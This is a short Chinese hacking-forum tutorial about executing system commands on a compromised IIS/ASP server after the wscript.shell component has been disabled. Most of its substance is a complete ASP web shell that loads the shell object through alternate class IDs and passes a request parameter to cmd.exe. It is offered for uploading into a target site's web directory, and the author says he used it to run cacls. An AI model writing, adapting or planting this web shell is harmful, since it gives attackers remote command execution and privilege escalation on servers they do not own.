首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

小技巧:wscript.shell关闭时的提权


http://www.gipsky.com/
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。

一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。

要想让运行命令可以试试这种方法,成功率为五五之数。

把下面代码复制:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if

response.write("<textarea readonly cols=80 rows=20>")

On Error Resume Next

response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall

response.write("</textarea>")

response.write("")

%>

保存为一个asp文件,然后传到网站目录上去

运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。

我用此成功运行过cacls命令。

第二那就是运行时出错,可能限制某些代码执行
<< JSP、靠下载拿shell 浅谈MySQL导出一句话一Shell的技巧 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号